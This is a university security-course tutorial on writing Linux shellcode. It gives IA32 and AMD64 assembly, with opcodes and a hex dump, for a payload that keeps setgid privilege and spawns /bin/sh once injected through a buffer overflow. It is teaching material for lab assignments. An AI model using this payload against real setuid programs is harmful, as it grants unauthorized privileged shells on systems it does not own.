# cs4459: Unit3 - Writing Shellcode Tutorial
## Objective
We can now change a program's control flow by exploiting a buffer overflow vulnerability. Previously we could jump into `execute_me()` because the program happened to contain such a function, but what should we do when no such function exists?
The answer is to write the code we want to execute ourselves, inject it into the program's address space, and then jump to it.
The next question is which code to write. If you can place arbitrary code in a program's address space, you might want to run the following:
```c=
execve("/bin/sh", 0, 0);
// or
system("/bin/sh");
```
Launching a shell (`/bin/sh`, `/bin/bash`, or another) from a program lets you run any command with the privilege inherited from that program (the assignment binary, or whatever program you are attacking).
The code we will write and use this week is therefore called `Shellcode` (because it runs a shell!).
## Requirement
To run a shell, we need to call
`execve("/bin/sh", 0, 0)` as a system call (we could also call `system("/bin/sh")`, but we will cover that later).
However, just running the shell will not let you keep the effective
privilege granted by the setuid/setgid bits, because a shell may drop it
when the real and effective IDs differ. To avoid this, run the
following beforehand:
```c=
setregid(getegid(), getegid()); // for the gid, as in our assignments.
setreuid(geteuid(), geteuid()); // for the uid, as in real attack cases.
```
So our job is to write code that runs:
```c=
setregid(getegid(), getegid());
execve("/bin/sh", 0, 0);
```
## System calls
Fortunately, none of these are ordinary function calls. They are
implemented in the OS kernel, and we can invoke them via
system calls.
The system call is the primary gateway from user space into the kernel.
On the IA32 architecture of Linux, a system call is made by issuing a *software
interrupt* with vector `0x80`:
```asm=
// IA32
int $0x80

// AMD64: a system call is made with the syscall instruction instead.
syscall
```
So how do we invoke a specific system call?
## IA32 Syscall
Syscalls are identified by numbers. You can look up the system call numbers [here][syscalls x86-32_bit].
From the table, we can see that:
```
sys_execve: 0xb
sys_getegid16: 0x32
sys_setregid16: 0x47
```
and the number of the call you want must be placed in the `%eax` register before invoking the system call.
For example, running `getegid()` requires:
```asm=
mov $0x32, %eax; // SYS_getegid
int $0x80;
```
The return value of the system call is stored in the `%eax` register,
so after running `int $0x80`, the result (the effective GID) will be in
`%eax`.
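The same "number in, result out" convention can be observed from C. The following is only a minimal sketch, assuming Linux with glibc, where `syscall()` and the `SYS_getegid` constant from `<sys/syscall.h>` are available; the helper names `raw_getegid` and `check_raw_getegid` are made up for this illustration.

```c
#define _GNU_SOURCE        /* asks glibc to declare syscall() */
#include <assert.h>
#include <sys/syscall.h>   /* SYS_getegid: the number for the target architecture */
#include <sys/types.h>
#include <unistd.h>        /* syscall(), getegid() */

/* Hypothetical helper: invoke getegid by its syscall number. glibc loads the
 * number into the syscall-number register, traps into the kernel, and hands
 * back whatever the kernel left in the return-value register. */
static long raw_getegid(void)
{
    return syscall(SYS_getegid);
}

/* Hypothetical self-check: the raw call and the libc wrapper should agree. */
static void check_raw_getegid(void)
{
    assert(raw_getegid() == (long)getegid());
}
```

Calling `check_raw_getegid()` from a test program should pass silently; the assembly version above does the same thing without the libc wrapper in between.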
Next is calling `setregid(getegid(), getegid())`.
This syscall takes two arguments, and on the x86 architecture of Linux,
system call arguments are passed as follows:
```
ebx : 1st argument
ecx : 2nd argument
edx : 3rd argument
esi : 4th argument
edi : 5th argument
```
So to call `setregid(getegid(), getegid())`, we need:
```
eax = 0x47
ebx = egid value
ecx = egid value
```
which we can set up as follows (with the result of `getegid()` still in `%eax`):
```asm=
mov %eax, %ebx // set ebx (1st arg) to the returned egid
mov %eax, %ecx // set ecx (2nd arg) to the returned egid
mov $0x47, %eax // set eax to $SYS_setregid
int $0x80
```
Now we move on to `execve("/bin/sh", 0, 0)`.
First, the syscall number is `0xb` (11). Both the 2nd and 3rd arguments
are zero, so we simply set both `%ecx` and `%edx` to
zero.
But what about passing `/bin/sh` in the `%ebx` register? `%ebx` must
hold the memory address at which the string `/bin/sh` is stored.
There are several options, but here we will build the string on the stack, since the stack is memory we can always write to.
A convenient way to do this is to use the `push` instruction to push values onto the stack.
We will push the following values:
```asm=
push $0 // mark the end of string (NULL)
push $0x68732f6e // push "n/sh"
push $0x69622f2f // push "//bi"
```
Because a `push` on x86 stores a *4-byte* value, we first pad the
string `/bin/sh` (7 bytes) to `//bin/sh` (8 bytes); the extra slash does not change which file the path names.
First, we push zero to mark the end of the string. Then we push
`0x68732f6e`, which is the string `n/sh` (in little endian!).
Finally, we push `0x69622f2f`, which is `//bi`.
Consequently, starting from the stack top, memory holds `//bi`, `n/sh`, `\0`,
which reads as `//bin/sh\0`.
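To see where the two constants come from, the little-endian packing can be written out in C. This is only an illustrative sketch; `pack_le32` and `check_push_constants` are hypothetical helper names, not part of the shellcode-template.

```c
#include <assert.h>
#include <stdint.h>

/* Hypothetical helper: pack four characters into the 32-bit immediate that
 * `push` needs so that they appear in memory in reading order on a
 * little-endian machine. The first character becomes the lowest byte. */
static uint32_t pack_le32(const char chunk[4])
{
    return  (uint32_t)(unsigned char)chunk[0]
         | ((uint32_t)(unsigned char)chunk[1] << 8)
         | ((uint32_t)(unsigned char)chunk[2] << 16)
         | ((uint32_t)(unsigned char)chunk[3] << 24);
}

/* The two halves of "//bin/sh" give exactly the constants pushed above. */
static void check_push_constants(void)
{
    assert(pack_le32("n/sh") == 0x68732f6eu);  /* 'n'=6e '/'=2f 's'=73 'h'=68 */
    assert(pack_le32("//bi") == 0x69622f2fu);  /* '/'=2f '/'=2f 'b'=62 'i'=69 */
}
```

Reading each constant from its lowest byte to its highest gives the characters in string order, which is why the hexadecimal value looks reversed.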
How do we make `%ebx` point to that address? The address of the current
stack top is always held in the `%esp` register, so just copy it into `%ebx` (`mov %esp, %ebx`).
In the [shellcode-template],
you can edit [shellcode.S] to write the shellcode.
To build the code, type:
```bash=
# For 32-bit x86 shellcode:
$ make 32
gcc -m32 -c -o shellcode.o shellcode.S &&\
gcc -o shellcode shellcode.o -m32 && \
objcopy -S -O binary -j .text shellcode.o shellcode.bin
# For 64-bit AMD64 shellcode:
$ make 64
...
```
After building the code, you can use some convenient commands I have provided, such as:
```bash=
$ make objdump
```
This shows the opcodes alongside your assembly code:
```
shellcode.o:     file format elf32-i386

Disassembly of section .text:

00000000 <main>:
   0:   b8 32 00 00 00          mov    $0x32,%eax
   5:   cd 80                   int    $0x80
   7:   89 c3                   mov    %eax,%ebx
   9:   89 c1                   mov    %eax,%ecx
   b:   b8 47 00 00 00          mov    $0x47,%eax
  10:   cd 80                   int    $0x80
  12:   b8 0b 00 00 00          mov    $0xb,%eax
  17:   b9 00 00 00 00          mov    $0x0,%ecx
  1c:   ba 00 00 00 00          mov    $0x0,%edx
  21:   6a 00                   push   $0x0
  23:   68 6e 2f 73 68          push   $0x68732f6e
  28:   68 2f 2f 62 69          push   $0x69622f2f
  2d:   89 e3                   mov    %esp,%ebx
  2f:   cd 80                   int    $0x80
```
```bash
$ make dump
```
This just dumps the code as hexadecimal values:
```
00000000: b832 0000 00cd 8089 c389 c1b8 4700 0000 .2..........G...
00000010: cd80 b80b 0000 00b9 0000 0000 ba00 0000 ................
00000020: 006a 0068 6e2f 7368 682f 2f62 6989 e3cd .j.hn/shh//bi...
00000030: 80
```
```bash
$ ./shellcode
```
Running this actually executes your code
(you should get a new shell with a `$` prompt if you coded it correctly).
## AMD64 Syscall
Syscalls are identified by numbers. You can look up the system call numbers [here][syscalls x86-64_bit].
:::warning
NOTE: system call numbers differ between 32-bit and 64-bit!!!
Argument passing is also different!
:::
On AMD64, the system call itself is invoked with:
```asm=
// not the int $0x80!
syscall
```
From the table, we can see that:
```
sys_execve: 59
sys_getegid: 108
sys_setregid: 114
```
and the number of the call you want must be placed in the `%rax` register before invoking the system call.
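As a quick cross-check of the IA32 and AMD64 numbers, the constants in `<sys/syscall.h>` can be compared against the two tables. This is a minimal sketch, assuming Linux headers are installed; the function name `syscall_numbers_match_tutorial` is made up for this illustration, and the preprocessor tests assume GCC or Clang's predefined macros.

```c
#include <assert.h>
#include <sys/syscall.h>   /* SYS_execve, SYS_getegid, SYS_setregid */

/* Hypothetical helper: returns 1 if the header's numbers match this
 * tutorial's table for the architecture being compiled for, 0 if they do
 * not, and -1 on an architecture the tutorial does not cover. */
static int syscall_numbers_match_tutorial(void)
{
#if defined(__x86_64__) && !defined(__ILP32__)
    /* AMD64 table */
    return SYS_execve == 59 && SYS_getegid == 108 && SYS_setregid == 114;
#elif defined(__i386__)
    /* IA32 table */
    return SYS_execve == 0xb && SYS_getegid == 0x32 && SYS_setregid == 0x47;
#else
    return -1;
#endif
}
```

Building the same file with `-m32` and `-m64` exercises both branches, which makes the difference in numbering concrete.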
For example, running `getegid()` requires:
```asm=
mov $108, %rax; // SYS_getegid
syscall;
```
The return value of the system call is stored in the `%rax` register,
so after running `syscall`, the result (the effective GID) will be in
`%rax`.
Next is calling `setregid(getegid(), getegid())`.
This syscall takes two arguments, and on the AMD64 architecture of Linux,
system call arguments are passed as follows:
```
rdi : 1st argument
rsi : 2nd argument
rdx : 3rd argument
r10 : 4th argument (not rcx, which the syscall instruction overwrites)
r8 : 5th argument
r9 : 6th argument
```
So to call `setregid(getegid(), getegid())`, we need:
```
rax = 114
rdi = egid value
rsi = egid value
```
which we can set up as follows (with the result of `getegid()` still in `%rax`):
```asm=
mov %rax, %rdi // set rdi (1st arg) to the returned egid
mov %rax, %rsi // set rsi (2nd arg) to the returned egid
mov $114, %rax // set rax to $SYS_setregid
syscall
```
Now we move on to `execve("/bin/sh", 0, 0)`.
First, the syscall number is `0x3b` (59). Both the 2nd and 3rd arguments
are zero, so we simply set both `%rsi` and `%rdx` to zero.
We will again put `//bin/sh` on the stack and make `%rdi` point to it.
However, we need to do this differently than on x86.
The reason is that AMD64 has no `push` that takes an 8-byte immediate value.
An immediate operand of `push` can be at most 4 bytes, and each push still occupies a full 8-byte stack slot (register pushes are 8 bytes).
For instance, if you do this:
```asm=
push $0 // mark the end of string (NULL)
push $0x68732f6e // push "n/sh"
push $0x69622f2f // push "//bi"
```
The stack will store (from the top), with each immediate extended to 8 bytes:
`0x0000000069622f2f`, `0x0000000068732f6e`, `0x0000000000000000`
The zero bytes right after `//bi` terminate the string, so it will be just `//bi`.
To push an 8-byte value, we need to move it into a register first
and then push the register.
Do this in the following way:
```asm=
mov $0x68732f6e69622f2f, %rbx
push $0
push %rbx
mov %rsp, %rdi
```
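The difference between the two push sequences can be modeled in C by writing the 8-byte stack slots into a byte array and asking `strlen` where the string ends. This is only a sketch of the memory layout, not of the instructions themselves; `store_le64` and the two `strlen_after_*` functions are hypothetical names introduced for this illustration.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical helper: write one 8-byte stack slot in little-endian order. */
static void store_le64(unsigned char *slot, uint64_t value)
{
    for (int i = 0; i < 8; i++)
        slot[i] = (unsigned char)(value >> (8 * i));
}

/* Model of the stack after the three `push imm32` instructions in 64-bit
 * mode. The last value pushed sits at the lowest address (the stack top). */
static size_t strlen_after_imm32_pushes(void)
{
    unsigned char stack[24];
    store_le64(stack + 0,  0x0000000069622f2fULL);  /* "//bi" then 4 zero bytes */
    store_le64(stack + 8,  0x0000000068732f6eULL);  /* "n/sh" then 4 zero bytes */
    store_le64(stack + 16, 0);                      /* terminator slot */
    return strlen((const char *)stack);
}

/* Model of the stack after `push $0` followed by `push %rbx`. */
static size_t strlen_after_register_push(void)
{
    unsigned char stack[16];
    store_le64(stack + 0, 0x68732f6e69622f2fULL);   /* "//bin/sh" */
    store_le64(stack + 8, 0);                       /* terminator slot */
    return strlen((const char *)stack);
}

/* The first layout ends after "//bi"; the second holds the full path. */
static void check_stack_strings(void)
{
    assert(strlen_after_imm32_pushes() == 4);
    assert(strlen_after_register_push() == 8);
}
```

The 4-byte pushes leave zero padding in the middle of the intended path, while the single register push keeps all eight characters contiguous.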
In the shellcode-template (you will have it if you ran `fetch week3`),
you can edit [shellcode.S] to write the shellcode.
To build the code, type:
```bash
$ make 64
gcc -m64 -c -o shellcode.o shellcode.S
gcc -o shellcode shellcode.o -m64
objcopy -S -O binary -j .text shellcode.o shellcode.bin
```
[syscalls x86-32_bit]:https://chromium.googlesource.com/chromiumos/docs/+/master/constants/syscalls.md#x86-32_bit "syscalls x86-32_bit"
[syscalls x86-64_bit]:https://chromium.googlesource.com/chromiumos/docs/+/master/constants/syscalls.md#x86_64-64_bit "syscalls x86-64_bit"
[shellcode-template]:https://xfersh.syssec.org/14uYkU/shellcode-template.tar.bz2 "shellcode-template"
[shellcode.S]: https://codimd.syssec.org/s/KBb3so5cp "shellcode.S"
---
###### tags: `candl`,`cs4459`,`shellcode`